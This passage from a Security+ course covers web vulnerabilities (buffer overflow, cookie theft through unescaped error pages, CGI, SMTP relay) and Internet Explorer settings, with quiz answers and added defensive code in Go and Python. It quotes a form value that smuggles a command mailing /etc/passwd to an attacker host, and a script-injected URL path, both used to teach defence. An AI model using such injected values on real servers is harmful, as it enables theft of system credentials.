Explanation   The buffer overflow attack can be triggered by sending large amounts of data that
              exceed the capacity of the receiving application within a given field. When executed
              with precision and deliberation, such attempts might cause the application to stop
              performing its intended functions and force it to execute commands on behalf of the
              attacker.
              If the application under attack has sufficient (root) administrative privileges, it is
              possible for the attacker to take control of the entire system through the controlled
              application. There are two prerequisite objectives the attacker needs to accomplish to
              execute a successful buffer overflow attack:
                   • Place the necessary code into the program’s address space — The attacker uses
                      the victim’s buffer to place the necessary code that executes the intended attack.
                      This is accomplished by sending instructions (bytes) to the CPU of the target
                      system.
                   • Direct the application to read and execute the embedded code through effective
                      manipulation of the registers and memory of the system — Most of the time, the
                      code the attacker is looking to exploit already exists on the target system. In
                      these types of situations, all the attacker needs to do is to modify the necessary
                      parameters to point to the targeted section of the code.
              These actions are intended to corrupt the receiving buffer and alter the program’s
              control flow to trigger the desired action.
              In such attacks, the attacker can gain access to a prompt, examine system-specific
              variables, read system directories and files, and even detect network architecture, which
              he or she can use to further exploit the system. This can be especially dangerous when
              the application is configured to have root privileges on the system. In this case, the
              attacker can operate as the system administrator of the Web server and its environment.
              Effective buffer overflow attacks are not easy to coordinate. The attacker needs to be
              precise enough to launch the attack using the instruction pointers so that he or she can
              take over the administrative privileges without crashing the system.

              Vulnerabilities
              Buffer overflow attacks often take advantage of poor application programming that does
              not check the size of the input field. Abundant information about the vulnerabilities is
              published on the Internet for the edification of vendors and hackers alike.

              Safeguards
              Careful design of the application, based on the intended response, can effectively
              prevent such attacks. While implementing buffers, software developers could set the
              program to throw away the excess data, halt all operations, or provide the user with a
              warning message if a buffer overflow condition presents itself. A more proactive
              approach would be to design the application to automatically check the size of the data
              that enters the buffer.
              System administrators should maintain current updates and patches on all software. The
              CERT Coordination Center (www.cert.org/current/) provides advisories on all
              recently discovered application vulnerabilities. They also maintain an archive of
              previously found vulnerabilities at www.cert.org/advisories.

                           Cookies
                           Cookies serve a variety of functions, from personalizing Web pages based on user
                           preferences to keeping the state of a user’s shopping cart on an online store. Most Web-
                           based authentication models are engineered to utilize cookies for verification of a user’s
                           session. Cookies have been designed to enhance the browsing experience of a typical
                           user.
                           Cookies are stored on a user’s hard drive and can be accessed by a user’s Web browser.
                           The files contain saved login information, your address, shopping cart status, and a host
                           of other things that can make the Web browsing experience more convenient. In
                           Windows 2000/Server 2003 and XP, these cookie files are stored in the Documents and
                           Settings folder for each user of the computer (the user profile).

                           Vulnerabilities
                           Cookies contain tools that are easily exploited by hackers and some so-called legitimate
                           services to provide information about users without consent. Hackers often target
                           cookies as a means of gaining illegal access to user accounts. Cookies can also be
                           utilized to track information, such as the browsing habits of users, which might then be
                           sold to an advertisement company that targets the user with unwanted ads. It’s
                           extremely crucial for Web site owners to design security measures to handle Web-based
                           cookies in order to protect their user base and the sensitive data stored on their servers.
                           Pages that can use a server’s cookies are limited to that particular server, or to a domain
                           hosting the server. An attacker could obtain a victim’s cookie for a given service by
                           generating a script that must execute within a page from that same domain or server.
                           One can accomplish this by a process known as Error Handling Exception (EHE). An
                           attacker can execute a code on the server that generates an error message that is returned
                           to the user. The attacker can then exploit the insecure error notification to launch an
                           attack on the target server. This is possible by manipulating the error messages that are
                           returned from 404 requests (404 File Error) or from elements that are echoed back to the
                           screen unescaped.
If students are unfamiliar with HTML coding, explain that the <A> tag is the anchor element
used in hyperlinks.

                           It’s not possible for an attacker to obtain a given cookie directly from a victim’s
                           computer. The attacker must convince a user to follow a malicious hyperlink to the
                           targeted server so the cookie can be obtained through the error handling process on the
                           server. For example, the attacker could send an e-mail (containing a link to the server)
                           to an HTML-enabled e-mail client. More specifically, a hacker can manufacture a
                           hyperlink and hide the malicious script behind the desired text of the <A> tag. When the
                           innocent user activates the link, the malicious script embedded in the link can trigger the
                           server to send the cookie to the attacker.

                           One of the limiting factors of this type of attack is that the user must be logged on to the
                           service during the time the attack takes place. If, for instance, the innocent user is not
                           logged on to his Hotmail account (HTML-enabled service), the attacker cannot use this
                           technique to launch the attack.
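The weak spot in the cookie attack described above is the error page that echoes request data back "unescaped". The Go program below is an added example, not code from this course; it shows a 404 page built with fmt.Sprintf, which reflects the requested path verbatim into HTML served from the server's own domain, beside the same page rendered with html/template, whose context-aware escaping turns any markup in the path into inert text. The request path is a constructed sample, and `NotFoundUnescaped`, `NotFoundEscaped` and `ContainsScript` are names chosen for this example.

```go
package main

import (
	"bytes"
	"fmt"
	"html/template"
	"strings"
)

// NotFoundUnescaped is the weak pattern: the requested path is pasted straight
// into the 404 page, so any markup the hyperlink carried is served as live
// HTML from this server's own domain, where the domain's cookies are in scope.
func NotFoundUnescaped(path string) string {
	return fmt.Sprintf("<html><body><h1>404 File Error</h1><p>The file %s was not found.</p></body></html>", path)
}

// notFoundTmpl is the same page as an html/template. The {{.}} action sits in
// HTML text context, so the package escapes <, >, &, " and ' on output.
var notFoundTmpl = template.Must(template.New("404").Parse(
	"<html><body><h1>404 File Error</h1><p>The file {{.}} was not found.</p></body></html>"))

// NotFoundEscaped renders the path through the template, so markup in the
// path is displayed as text rather than interpreted by the browser.
func NotFoundEscaped(path string) (string, error) {
	var buf bytes.Buffer
	if err := notFoundTmpl.Execute(&buf, path); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// ContainsScript reports whether a rendered page carries a live <script> tag.
// Run over pages built from untrusted input, it is a cheap regression check.
func ContainsScript(page string) bool {
	return strings.Contains(strings.ToLower(page), "<script")
}

func main() {
	// Constructed request path of the kind a malicious hyperlink might carry.
	path := "/account<script>evil()</script>.htm"
	fmt.Println("unescaped:", NotFoundUnescaped(path))
	esc, _ := NotFoundEscaped(path)
	fmt.Println("escaped:  ", esc)
	fmt.Println("live script in unescaped page:", ContainsScript(NotFoundUnescaped(path)))
	fmt.Println("live script in escaped page:  ", ContainsScript(esc))
}
```

The same rule applies to every element the text mentions as "echoed back to the screen unescaped", not only the file name in a 404 page: output encoding belongs at the point where untrusted data is placed into HTML.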

         Safeguards
         The following policies will help protect your organization against cookie exploits:
             • Disable the use of cookies by reviewing your browser’s preferences and options.
               You can also specify that you be prompted before a site puts a cookie on your
               hard disk, so you can choose to allow or disallow the cookie.
               Notice that disabling cookies will make some Web pages inoperable.
             • Do not use cookies to store sensitive information.
             • If you must store confidential information in cookies, use SSL/TLS to prevent
               the information from being exploited by a hacker.

Do it!   B-2:     Discussing buffer overflow and cookie vulnerabilities
          Questions and answers
           1 Buffer overflow attacks perform which of the following task(s)? (Choose all that
             apply.)
              A      Monitor a browser’s activities.
              B      Send enough data to overfill the buffer of a given field within an application.
              C      Force an application to execute commands on behalf of the attacker.
              D      Embed malicious macros.

           2 What are the prerequisites for executing a buffer overflow? (Choose all that apply.)
              A      The attacker must modify the necessary parameters to point to the embedded
                     code.
              B      The attacker must log in as the system administrator of the Web server.
              C      The attacker must launch the attack while the user is logged onto the service.
              D      The attack must place the necessary code to execute the attack in the victim’s
                     buffer.

           3 A hacker can exploit cookies to gain illegal access to user accounts and track the
             browsing habits of users. True or false?

              True

           4 Hackers can only gain access to a cookie if the user logs on to the targeted service
             at the same time the attack takes place. True or false?

              True

                     Java applets
Explanation          Java applets are Internet applications (written in Java programming language) that can
                     operate on most client hardware and software platforms. Applets are typically stored on
                     Web servers, from which they can be downloaded onto clients when accessed for the
                     first time. When subsequently accessing the server, the applet is already cached on the
                     client and, therefore, can be executed with no download delay.

                     Signed and unsigned applets
                     Distribution of software over networks poses potential security problems because the
                     software must pass through many intermediate devices before it reaches the user’s
                     computer. Software, unless downloaded from a “trusted” party, poses significant risks
                     for an individual user’s computer and data. The user often has no reliable way of
                     confirming the source of downloaded software code or whether it was changed in transit
                     over the network.
                     Signing applets is a technique of adding a digital signature to an applet to prove that it
                     came unaltered from a particular trusted source. The application generates a
                     private/public key pair and obtains a certificate authenticating the signer. The
                     application then signs the applet code. Users downloading the applet can check the
                     signature to verify the source of the code.
                     Signed applets can be given more privileges than ordinary applets. An unsigned applet
                     operates subject to a set of restrictions called the sandbox model. Sandbox restrictions
                     prevent the applet from performing certain operations on local system resources (for
                     example, deleting files or modifying system information such as registry settings and
                     other control panel functions). Signed applets do not have such restrictions. Unsigned
                     applets typically display warning messages, such as the ones shown in Exhibit 6-2.




                     Exhibit 6-2: Unsigned applet warning message

                     The user of the system on which the applet will be running decides what kind of access
                     privileges should be granted to the signer of the applet. Commonly used browsers, such
                     as Netscape and Microsoft Internet Explorer, keep track of these privileges. Depending
                     on the applet’s privileges, such browsers can grant access to system resources without
                     interrupting the user. If the applet is new and has not established a trust relationship
                     with the client’s system, the browser displays a security message asking for the client’s
                     consent, as shown in Exhibit 6-3.




Exhibit 6-3: Security message confirming consent

Digitally signing an applet is a confirmation from the owner of the applet about its
legitimate purpose. The final decision about whether the applet should have access to
system resources always rests with the client. If a signed applet damages a system,
intentionally or unintentionally, the applet can be traced back to its source from its
signature. Two reasons for using code signing features are:
    • To release the application from the sandbox restrictions imposed on unsigned
      code
    • To provide confirmation regarding the source of the application’s code
The Java Development Kit (1.1 and later) Security Manager is aware of signatures, and,
working in conjunction with the Java key tool (which is used to sign code and specify
who is trusted), grants special privileges to signed and trusted applet code.

                  CGI
                  The Common Gateway Interface (CGI) is a programming interface that allows Web
                  servers to perform data manipulation and interact with users. For example, CGI scripts
                  perform data input, and search and retrieval functions on databases. CGI was created to
                  extend the HTTP protocol.
                  There are typically two parts to a CGI script: an executable program on the server (the
                  script itself), and an HTML page that feeds input to the executable. The executable can
                  be in the form of Perl scripts, shell scripts, or compiled programs. CGI scripts can
                  sometimes be used without user input to perform tasks such as incrementing page
                  counters and displaying the date and time.
                  The following steps and Exhibit 6-4 represent a typical form submission that takes place
                  on the Internet:
                      1 The user/client retrieves a form (an HTML-formatted page) from a server via a
                          browser.
                      2 The user fills out the form by inputting data into the required fields on his or her
                          local machine.
                      3 After filling out the form, the user submits the data to the server. This typically
                          takes place via the use of a “submit” button on the form.
                      4 The submit action performed on the client’s browser identifies the corresponding
                          program residing on the server, sends all inputted data, and issues an execute
                          request to the server.
                      5 The server executes the requested program.




                  Exhibit 6-4: Working of a CGI script

                  A similar process takes place for all types of CGI execution. CGI is very efficient
                  because all data manipulation takes place on the server, not the client. The client merely
                  passes data to the server and receives HTML in return. This leaves the server with only
                  the task of executing the request when issued.

                  Vulnerabilities
                  The interactive nature of CGI also leads to security loopholes that need to be addressed
                  by system administrators and software developers. CGI accepts input from a page on a
                  client system (typically an HTML page downloaded in the browser), but executes the
                  request on the server. Allowing input from other systems to a program that runs on a
                  local server exposes the system to potential security hazards. Because the HTML form
                  has been transferred to the client, a malicious user can modify or add parameters to the
                  HTML form, instructing the server to do tasks outside the intended purpose of the form.

For instance, consider the following instruction, which is supposed to generate an e-mail
to a system administrator:
    <INPUT TYPE="radio" NAME="send_to" VALUE="systemadmin@example.com">System Admin<br>
A malicious user can modify it to the following line:
    <INPUT TYPE="radio" NAME="send_to" VALUE="systemadmin@example.com;mail malicioususer@attack.com /etc/passwd">System Admin<br>
If the script hands the send_to value to a shell command without checking it, this line
sends an e-mail containing the UNIX password file to the attacker. Using such techniques,
an attacker can gain access to confidential files and system files or install malicious
programs and viruses.

Safeguards
It is extremely important to take precautions when running scripts on the Web server.
Here are some possible precautions to take:
    • Deploy intrusion detection systems (IDS), access list filtering and screening.
    • Design and code applications to check the size and content of the input received
      from the clients.
    • Create different user groups with different permissions and restrict access to the
      hierarchical file system based on those groups.
    • Validate the security of a prewritten script before deploying it in your production
      environment.
The biggest security risk of CGI scripts is not to the client where the Web browser
resides, but to the server where the script resides. CGI scripts must be carefully
scrutinized before allowing them to be placed on a Web server.
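As an added example (not from the course text), the following Python shows how a CGI handler could apply the input-checking precaution above to the send_to field of the mail form discussed earlier: the submitted value is checked for size and content, mapped through an allowlist of recipients, and handed to the mail program as an argument list instead of being spliced into a shell command. The recipient keys, the 64-character limit and the form bodies are constructed for this example.

```python
from urllib.parse import parse_qs

# Constructed for this example: the only recipients the form is meant to reach.
# The form now submits a short key; the server maps the key to an address.
ALLOWED_RECIPIENTS = {
    "systemadmin": "systemadmin@example.com",
    "webmaster": "webmaster@example.com",
}
MAX_FIELD_LEN = 64


def vulnerable_mail_command(send_to):
    """The pattern the text describes: the submitted value is spliced into a
    shell command string, so a ';' in the value becomes a second command.
    Returns the string for inspection only; nothing here executes it."""
    return "mail " + send_to


def hardened_mail_argv(send_to):
    """Check size and content, look the value up in the allowlist, and return an
    argument list. Run with subprocess.run(argv) (no shell=True), no character
    in the value can start another command."""
    if len(send_to) > MAX_FIELD_LEN:
        raise ValueError("send_to field too long")
    if not (send_to.isascii() and send_to.isalnum()):
        raise ValueError("send_to contains characters outside [A-Za-z0-9]")
    recipient = ALLOWED_RECIPIENTS.get(send_to)
    if recipient is None:
        raise ValueError("send_to is not a permitted recipient")
    return ["mail", recipient]


def handle_form(body):
    """Parse an application/x-www-form-urlencoded POST body, as a CGI script
    would read it from stdin, and return the argv for the mail command."""
    fields = parse_qs(body, strict_parsing=True, max_num_fields=10)
    values = fields.get("send_to", [])
    if len(values) != 1:                 # a missing or duplicated field is also suspect
        raise ValueError("send_to must be submitted exactly once")
    return hardened_mail_argv(values[0])


def is_rejected(body):
    """True if handle_form refuses the submission."""
    try:
        handle_form(body)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # The modified value from the text, as a browser would URL-encode it.
    injected = ("send_to=systemadmin%40example.com%3Bmail+malicioususer"
                "%40attack.com+%2Fetc%2Fpasswd")
    print(vulnerable_mail_command(parse_qs(injected)["send_to"][0]))
    print(handle_form("send_to=systemadmin"))
    print(is_rejected(injected))
```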

Do it!              B-3:        Reviewing signed applet and CGI vulnerabilities
                      Questions and answers
                       1 A(n) unsigned applet operates subject to a set of restrictions called the
                         _________________________.

                          Sandbox model

                       2 New applets require the consent of the client to install. True or false?

                          True

                       3 __________________ is a programming interface that allows Web servers to
                         perform data manipulation and interact with users.

                          CGI

                       4 Which of the following tasks can CGI scripts perform? (Choose all that apply.)
                          A      Search for information
                          B      Embed malicious macros in a document
                          C      Collect client data using forms
                          D      Mail password files to an attacker

                       5 List two precautions that you should take when running CGI scripts.

                          Answers might include:
                          • Deploy intrusion detection systems (IDS), access list filtering and screening on the
                              border of the network.
                          • Design and code applications to check the size and content of the input received from the
                              clients.
                          • Create different user groups with different permissions and restrict access to the
                              hierarchical file system based on those groups.
                          • Validate the security of a prewritten script before deploying it in your production
                              environment.

              SMTP relay
Explanation   Simple Mail Transfer Protocol (SMTP) is the standard Internet protocol for global e-
              mail communications. A mail client (user) communicates with the mail server using the
              SMTP protocol’s TCP port 25 to get e-mail from one place to another. Current versions
              of SMTP support ASCII and MIME content.
               Because SMTP is used so heavily across the Internet, it was intentionally designed as a
               very simple protocol. This makes it easy to understand and troubleshoot; unfortunately,
               it also makes the protocol easy for malicious users to exploit in many ways.

              SMTP spams
              Third-party SMTP relay is used to transfer messages from one server to another via
              SMTP. A malicious user could exploit this basic concept and try to hide the real origin
              of a message by using another server as an SMTP relay. In such a scenario, the attacker
              can use the relay Internet Mail Service as an agent for unsolicited commercial e-mail
              (spam), flooding innocent users’ mailboxes with many copies of the same message.
              Spam is an attempt to force messages on people who would not otherwise choose to
              receive them.
              Before you can understand how spamming is achieved via SMTP relay, it’s important to
               understand how SMTP functions. The following exchange demonstrates the sending of an
               e-mail message through the protocol itself, as opposed to using a user-friendly e-mail
               client such as Eudora. You can actually accomplish this by connecting to TCP port 25
               of the SMTP server and entering these commands.
                   HELO mail.example.com
                   250 mail.anotherexample.com Hello mail.example.com [172.16.35.44], pleased to meet you
                   MAIL FROM: person1@example.com
                   250 person1@example.com... Sender ok
                   RCPT TO: person2@anotherexample.com
                   250 person2@anotherexample.com... Recipient OK
                   DATA
                   354 Enter mail, end with "." on a line by itself
                   From:
                   To:
                   .
                   250 OAA08757 Message accepted for delivery
               This transaction takes place between two SMTP servers. The sending server issues the
               command lines (HELO, MAIL FROM:, RCPT TO:, DATA, and the message text that follows);
               the lines that begin with a three-digit code are responses from the receiving server.
               The sending server introduces itself as “example.com.” The receiving server serves the
               “anotherexample.com” domain. The “MAIL FROM:” and “RCPT TO:” fields indicate the
               source and the destination of the message. These fields (up until the “DATA” field)
               make up the “envelope” of the message. The “DATA” field comprises the body of the
               message as well as the header fields. The key point is that the only variable needed
               to deliver the message is the “RCPT TO:”; a malicious user can forge all the others.

                  It’s important to identify the real origin of a spam mail in order to take the necessary
                  action. An e-mail message typically traverses through at least two SMTP servers (the
                  sender’s and the receiver’s SMTP servers) before reaching the destination client. As
                  messages voyage to their destination, they get “stamped” by the intermediate SMTP
                  servers along the way. The stamps generate useful tracking information that can be
                  observed in the mail headers. Careful examination of these mail headers can go a long
                  way in identifying the real source of spam mail. The following text is a typical
                  “Received:” header from an e-mail message:
                       From forged-address@example.com
                       Received: from example.com ([172.16.35.44]) by mail.anotherexample.com (8.8.5) for <receiver@anotherexample.com>…
                  Although such messages do not issue any alarms per se, careful examination of these
                  messages could unveil mismatches between the IP addresses and the domain names
                  indicated in the header. You could verify this by executing a reverse DNS lookup to
                  find out the domain name that corresponds to the indicated IP address. For instance, in
                  the Received: header above, reverse DNS lookup could reveal that the IP address
                  (172.16.35.44) does not really correspond to the “example.com” domain. In fact, most
                  modern mail programs have already incorporated this functionality, which generates a
                  Received: header that includes the identity of the attacker.
                  Spam via SMTP relay can lead to loss of bandwidth and hijacked mail servers that
                  might no longer be able to serve their legitimate purpose. Furthermore, mail servers of
                  innocent organizations can be subject to blacklisting due to problems caused by SMTP
                  relay. This might in turn prevent an organization from communicating with other
                  organizations.
                  There are institutions, such as the Open Relay Behavior-Modification System (ORBS)
                  and Mail Abuse Prevention System (MAPS), which provide reporting, cataloging, and
                  testing of e-mail servers configured for SMTP relay. These institutions maintain Real-
                  time Blackhole Lists (RBL) of mail servers with problematic histories. Being
                  blacklisted by these types of organizations can adversely affect a business’s operations.

                  Safeguards
                   Companies might configure their systems so that any mail coming from blacklisted
                   mail servers is automatically rejected.
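The following Python simulation of the receiving server is an added example, not part of the course text. It answers the same commands as the exchange above, refuses to relay for recipients outside its own domains unless the client connects from the organization’s own network, turns away a blacklisted source at the greeting, and stamps a Received: header that records the client’s actual IP address next to its HELO claim; helo_mismatch then compares that IP against a reverse-DNS result, as the header discussion above describes. The server name, local domains, network range, blacklist entry and PTR table are constructed stand-ins for real configuration and DNS.

```python
import ipaddress
import re

# Constructed for this example; stands in for real configuration and DNS lookups.
SERVER_NAME = "mail.anotherexample.com"
LOCAL_DOMAINS = {"anotherexample.com"}                    # domains we deliver for
LOCAL_NETWORKS = [ipaddress.ip_network("192.0.2.0/24")]   # our own users may relay out
BLACKLIST = {"203.0.113.7"}                               # stand-in for an RBL listing
PTR_TABLE = {                                             # stand-in for reverse DNS
    "172.16.35.44": "host44.unrelated.example",
    "192.0.2.10": "mail.example.com",
}
ADDR_RE = re.compile(r"[^<>@\s]+@[^<>\s]+")
RECEIVED_RE = re.compile(r"Received: from (\S+) \(\[([\d.]+)\]\)")


def _parse_address(arg):
    """Return (address, domain) from a MAIL FROM / RCPT TO argument, or None."""
    m = ADDR_RE.search(arg)
    if m is None:
        return None
    addr = m.group(0)
    return addr, addr.rsplit("@", 1)[1].lower()


class RelaySession:
    """Server side of one SMTP connection, applying an anti-open-relay policy."""

    def __init__(self, client_ip):
        self.client_ip = ipaddress.ip_address(client_ip)
        self.helo = ""
        self.sender = ""
        self.recipients = []
        self.in_data = False

    def greeting(self):
        """Sent on connect; a listed client is turned away before any command."""
        if str(self.client_ip) in BLACKLIST:
            return "554 5.7.1 Service unavailable; client host is blacklisted"
        return f"220 {SERVER_NAME} ESMTP"

    def handle(self, line):
        """Return the response to one client line (None for message body lines)."""
        if self.in_data:
            if line == ".":                          # terminator named in the 354 reply
                self.in_data = False
                return "250 Message accepted for delivery"
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self.helo = arg.strip()
            return f"250 {SERVER_NAME} Hello {self.helo} [{self.client_ip}], pleased to meet you"
        if verb == "MAIL":
            parsed = _parse_address(arg)
            if parsed is None:
                return "501 5.1.7 Bad sender address syntax"
            self.sender = parsed[0]                  # recorded but never trusted: forgeable
            return f"250 {self.sender}... Sender ok"
        if verb == "RCPT":
            parsed = _parse_address(arg)
            if parsed is None:
                return "501 5.1.3 Bad recipient address syntax"
            addr, domain = parsed
            # Inbound mail for our domains is fine; outbound only from our own network.
            client_is_local = any(self.client_ip in net for net in LOCAL_NETWORKS)
            if domain in LOCAL_DOMAINS or client_is_local:
                self.recipients.append(addr)
                return f"250 {addr}... Recipient OK"
            return f"550 5.7.1 {addr}... Relaying denied"
        if verb == "DATA":
            if not self.recipients:
                return "503 5.5.1 Need RCPT (recipient)"
            self.in_data = True
            return '354 Enter mail, end with "." on a line by itself'
        return "500 5.5.1 Command unrecognized"

    def received_header(self):
        """The stamp this server adds: the HELO claim beside the real connecting IP."""
        rcpt = self.recipients[0] if self.recipients else ""
        return f"Received: from {self.helo} ([{self.client_ip}]) by {SERVER_NAME} for <{rcpt}>"


def helo_mismatch(header):
    """True when reverse DNS for the stamped IP does not fall under the HELO name's domain."""
    m = RECEIVED_RE.match(header)
    if m is None:
        raise ValueError("not a Received: header in the expected form")
    claimed, ip = m.groups()
    domain = ".".join(claimed.lower().split(".")[-2:])   # mail.example.com -> example.com
    ptr = PTR_TABLE.get(ip, "").lower()
    return not (ptr == domain or ptr.endswith("." + domain))


if __name__ == "__main__":
    s = RelaySession("172.16.35.44")
    print(s.greeting())
    for cmd in ("HELO mail.example.com", "MAIL FROM: person1@example.com",
                "RCPT TO: person2@anotherexample.com", "RCPT TO: victim@elsewhere.example"):
        print(cmd, "->", s.handle(cmd))
    print(s.received_header(), "| mismatch:", helo_mismatch(s.received_header()))
```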

Do it!   B-4:   Understanding SMTP relay vulnerabilities
          Questions and answers
          1 SMTP is an Internet e-mail service and uses TCP port 25. True or false?

            True

          2 It is possible to forge the MAIL FROM: variable within an SMTP message. True
            or False?

            True

          3 Describe some of the problems with spam via SMTP relay.

            Spam via SMTP relay can lead to a loss of bandwidth and hijacked mail servers that might no
            longer be able to serve their legitimate purpose. Furthermore, mail servers of innocent
            organizations can be subject to blacklisting due to problems caused by SMTP relay. This
            might in turn prevent an organization from communicating with other organizations. If you
            are blacklisted, your business operations can be adversely affected. Your e-mail might be
            automatically rejected by other organizations that configure their systems based on the
            blacklisted mail servers.


Topic C: Configuring Internet Explorer security
Explanation              Most large companies have advanced firewalls and proxy services that allow them to
                         filter or block certain content addressed to employee desktops. This is a necessary
                         feature, but it’s not always practical, especially for small- to mid-sized companies.
                         Fortunately, Microsoft has built security features into Internet Explorer that are
                         available to all of its users.




                         Exhibit 6-5: Internet Options dialog box with the Security tab activated.


Do it!                   C-1:     Configuring and discussing security
                           Here’s how                                Here’s why
                            1 Switch to Internet Explorer            You’ll configure Trusted Sites in Microsoft
                                                                     Internet Explorer 6.

                            2 Choose Tools, Internet
                               Options…

                            3 Activate the Security tab              As shown in Exhibit 6-5.

                            4 Select Trusted Sites

 5 Click Default Level                 To set the security level for the zone to Medium.
                                       If it is already set to Medium, the Default Level
                                       button will be dimmed.

 6 Click Sites

 7 Add the following Web site to the
   zone:
   www.course.com
 8 Click Close

 9 Select Restricted Sites             To configure Restricted Sites to block file
                                       downloads in Microsoft Internet Explorer 6.

10 Click Sites

   Add the following Web sites to
   the zone:
   www.kazaa.com
   ftp.microsoft.com




11 Click Close

12 Click OK                            To close the Internet Options Window.

13 In the Internet Explorer Address    Notice the Restricted sites icon in the lower
   box, enter www.kazaa.com            right corner of the browser. Kazaa completely
                                       fails to load.

14 Enter ftp.microsoft.com             In the browser's Address field.

   Navigate to /Reskit/win2000

15 Right-click ADSizer.exe

   Select Copy to Folder               A security alert appears.

                                       URLs can be redirected, so this is not the best
                                       way to block file downloads.

   Click OK                            To close the alert.

16 Close the browser

Do it!              C-2:      Reviewing trusted sites
                      Questions and answers
                       1 Which of the following is a zone that contains all Web sites that have not been
                         placed in other zones?
                          A    Internet
                          B    Local intranet
                          C    Trusted sites
                          D    Restricted sites

                       2 Which of the following is a zone that contains Web sites that could potentially
                         cause damage to your system? (Choose all that apply.)
                          A    Internet
                          B    Local intranet
                          C    Trusted sites
                          D    Restricted sites

                       3 Which of the following is a zone that contains Web sites that you believe will not
                         cause damage to your system?
                          A    Internet
                          B    Local intranet
                          C    Trusted sites
                          D    Restricted sites

              Privacy settings
Explanation   One issue many users have with Web browsing is the fact that anyone on the Internet
              has the ability to write information to their computer’s hard drive. One example of this
              ability is the use of cookies. Cookies can be valuable to both the user and the company
              that deposits them. For example, if you go to an e-commerce site and fill out a form
              with all your important data, a cookie can be used to remember you. This is helpful
              because you’ll not have to enter the data every time you visit the site. While this
              capability can be very helpful, it can also be a major security risk. With that cookie on
              your computer, anyone with access to your computer could go to the e-commerce site
              and purchase goods without your knowledge.




              Exhibit 6-6: The Internet Explorer Privacy settings tab




                    Exhibit 6-7: Overriding Privacy settings with Per Site Privacy Actions to allow cookies
                    to a selected site


Do it!              C-3:     Configuring and discussing privacy settings
                      Here’s how                               Here’s why
                       1 Launch Internet Explorer              You’ll configure Microsoft Internet Explorer 6
                                                               Privacy settings.

                       2 Choose Tools, Internet                The Internet Options window appears.
                          Options…

                       3 Activate the Privacy tab

                          Slide the Settings bar up to High    To block cookies that do not comply with the
                                                               W3C P3P.

                       4 Click Edit…                           To add Web sites you want to allow to bypass
                                                               the settings.

                       5 In the Address of Web Site box,
                         type www.yahoo.com

                       6 Click Allow                           Notice that only the domain is added to the
                                                               Managed Web sites list.

                          Click OK

                       7 Click OK

 8 In the Address box of your
   browser, enter www.msn.com

 9 In the Privacy message, click OK

   Double-click the cookie privacy
   warning in the toolbar
                                      A report displays, similar to the one shown
                                      below:




10 Click Close

11 In the Internet Explorer Address   Notice the privacy warning is absent.
   box, enter www.yahoo.com

12 Choose Tools, Internet
   Options…

13 Activate the Privacy tab           You’ll reset the privacy settings.

14 Click Default

   Click Apply                        To return to the medium setting.

Do it!              C-4:      Reviewing cookies
                      Questions and answers
                       1 A cookie is a small text file that stores information that can be used by a server.
                         True or false?

                          True

                       2 Which of the following Privacy settings will block all cookies without a Compact
                         Privacy Policy?
                          A      Block all cookies
                          B      High
                          C      Medium high
                          D      Accept all cookies

                       3 Which of the following Privacy settings is likely to cause some Web pages to fail
                         to load? (Choose all that apply.)
                          A      Block all cookies
                          B      High
                          C      Medium high
                          D      Medium
                          E      Low
                          F      Accept all cookies

              Advanced security settings
Explanation   In addition to cookies, Internet Explorer can store information about your Web
              browsing habits by caching. This can be a problem in areas that require a high level of
              security. Most users are aware of Temporary Internet Files and how to remove them.
              Temporary Internet Files are used as a local cache to increase the speed of Web
              browsing, but the files can also be used to track your path on the Web. Usernames and
              passwords can also be stored to save you time, but this might allow unauthorized
              access to resources. These issues can be resolved by using Internet Explorer’s Advanced
              Security Settings.




              Exhibit 6-8: Advanced Internet security options

Do it!              C-5:     Configuring and discussing advanced security
                             settings
                      Here’s how                            Here’s why
                       1 Activate the Advanced tab

                          Scroll down to the Security       (As shown in Exhibit 6-8.)
                          section and review the settings

                       2 Activate the Content tab

                       3 Click AutoComplete…

                          Clear Usernames and
                          passwords on forms




                       4 Click OK                           To close the AutoComplete Settings window.

                       5 Click OK                           To close the Internet Options window.

                       6 Close all open windows

Do it!   C-6:   Reviewing advanced security settings
          Questions and answers
          1 If you wish to prevent secure files from being stored in Temporary Internet Files,
            which of the following Security options can you check?
            A    Do not save encrypted file to disk
            B    Empty Temporary Internet Files folder when browser is closed
            C    Use Fortezza
            D    Do not save Certificates to disk

          2 When you enable the option Empty Temporary Internet Files folder when
            your browser is closed, it also deletes all cookies. True or false?

            False: It does not affect the cookies.


Unit summary: Web security
Topic A              In this topic, you learned the fundamentals of SSL/TLS and HTTPS protocols and their
                     implementation on the Internet. You learned that the Secure Sockets Layer (SSL) and
                     Transport Layer Security (TLS) are commonly used protocols for managing the security
                     of a message transmitted across the “insecure” Internet.
Topic B              In this topic, you learned the basics of how JavaScript, buffer overflow, ActiveX,
                     cookies, CGI, applets, and SMTP relay work, and how they are commonly exploited
                     by hackers.
Topic C              In this topic, you learned how to configure Microsoft Internet Explorer to block cookies
                     and file downloads and to set privacy settings. You also learned how to configure
                     advanced security settings.

                     Review questions
                     1   Signing applets is a technique of adding a _________ __________ to an applet to
                         prove that it came unaltered from a particular trusted source.
                         digital signature

                     2   Sandbox restrictions might prevent the applet from performing required operations
                         on local system resources. True or false?
                         True

                     3   In order to use SSL security in a Web page transaction, what must be used in the
                         Web page URL?
                         HTTPS

                     4   A time stamp is a typical component found on a typical certificate. True or false?
                         True

                     5   __________________ is an interface specification that allows communications between
                         client programs and Web servers.
                         CGI


Unit 7
Directory and file transfer services
                           Unit time: 90 minutes

                           Complete this unit, and you’ll know how to:

                           A Describe LDAP directory services.

                           B Identify the major vulnerabilities of the
                              FTP method of exchanging data and
                              identify countermeasures.

                           C Describe the threat posed to your network
                              by unmonitored file sharing.


Topic A: Introduction to directory services
                     This topic covers the following CompTIA Security+ exam objective:

                      #        Objective

                      2.4      Recognize and understand the administration of the following directory security concepts
                                • LDAP (Lightweight Directory Access Protocol)




                     Directory services
Explanation          A directory service provides a database for inventory and administration of every object
                     on the network. The directory service performs the following functions:
                            • Records and organizes information about every user account, server, printer,
                              workstation, and file system on the network.
                            • Grants users access to applications, files, printers, and other network services
                              anywhere on the network with a single login sequence.
                            • Enables the LAN Administrator to track the location and disposition of all
                              network resources.
                     Information gathered for each network resource is stored as an object in the database.
                     Users can query the database using a broad set of criteria (such as name, type of service,
                     or location).

                     LDAP
                     Lightweight Directory Access Protocol (LDAP) is a commonly used directory service
